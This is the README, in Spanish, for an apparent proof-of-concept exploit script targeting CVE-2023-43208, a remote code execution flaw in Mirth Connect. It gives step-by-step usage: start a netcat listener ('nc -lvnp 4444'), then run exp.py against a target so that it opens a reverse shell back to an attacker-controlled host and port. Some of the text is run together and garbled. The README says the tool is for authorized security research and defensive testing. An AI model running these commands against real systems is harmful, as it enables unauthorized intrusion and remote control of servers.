
PoC para la explotación de RCE CVE-2023-43208.
Script Python de prueba de concepto dirigido a CVE-2023-43208 en Mirth Connect.
Úselo únicamente en entornos de los que sea propietario o para los que tenga autorización explícita de prueba. Este repositorio es para investigación de seguridad, validación y pruebas defensivas. El autor no asume ninguna responsabilidad por cualquier uso indebido o daño causado por esta herramienta.
exp.py es una versión de dependencias mínimas del PoC que:
/api/server/version4.4.1/api/users si el objetivo parece vulnerableEl script usa HTTPS por defecto y se puede cambiar a HTTP con --http.
python3 exp.py -u <target> -lh <listener_host> -lp <listener_port> [--http]
-u, --url: URL u host de Mirth Connect objetivo-lh, --lhost: Host/IP local para la conexión reversa-lp, --lport: Puerto local en escucha--http: Forzar HTTP en lugar de HTTPS (el valor predeterminado es HTTPS)Inicie primero un listener:
nc -lvnp 4444
Ejecute el script:
python3 exp.py -u https://target.example.com -lh 192.168.1.10 -lp 4444
Para un objetivo solo HTTP:
python3 exp.py -u target.example.com -lh 192.168.1.10 -lp 4444 --http
4.4.1.K3ysTr0K3R y Chocapikkpredyy